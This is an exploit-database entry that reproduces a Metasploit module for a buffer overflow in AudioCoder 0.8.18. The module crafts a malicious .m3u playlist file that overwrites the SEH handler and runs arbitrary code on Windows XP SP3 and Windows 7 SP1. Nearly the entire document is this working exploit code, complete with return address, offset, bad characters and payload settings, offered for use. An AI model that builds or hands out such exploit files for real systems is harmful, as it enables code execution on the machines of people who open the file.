AudioCoder .M3U Buffer Overflow

2013-05-08T00:00:00
ID 1337DAY-ID-20750
Type zdt
Reporter metasploit
Modified 2013-05-08T00:00:00

Description

Exploit for windows platform in category local exploits

                                        
                                            require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
 
  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Seh
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'AudioCoder .M3U Buffer Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in Audio Code 0.8.18. The vulnerability
        occurs when adding an .m3u, allowing arbitrary code execution with the privileges
        of the user running AudioCoder. This module has been tested successfully on
        AudioCoder 0.8.18.5353 over Windows XP SP3 and Windows 7 SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'metacom', # Vulnerability discovery and PoC
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          [ 'OSVDB', '92939' ],
          [ 'EDB', '25141' ]
        ],
      'DefaultOptions'  =>
        {
          'EXITFUNC' => 'process'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'Space'           => 6596,
          'BadChars'        => "\x00\x5c\x40\x0d\x0a",
          'DisableNops'     => true,
          'StackAdjustment' => -3500,
        },
      'Targets'        =>
        [
          [ 'AudioCoder 0.8.18.5353 / Windows XP SP3 / Windows 7 SP1',
            {
              'Ret'     => 0x66011b56, # ppr from libiconv-2.dll
              'Offset'  => 765
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'May 01 2013',
      'DefaultTarget'  => 0))
 
    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']),
      ], self.class)
 
  end
 
  def exploit
    buffer = "http://"
    buffer << rand_text(target['Offset'])
    buffer << generate_seh_record(target.ret)
    buffer << payload.encoded
 
    file_create(buffer)
  end
end

#  0day.today [2018-04-11]  #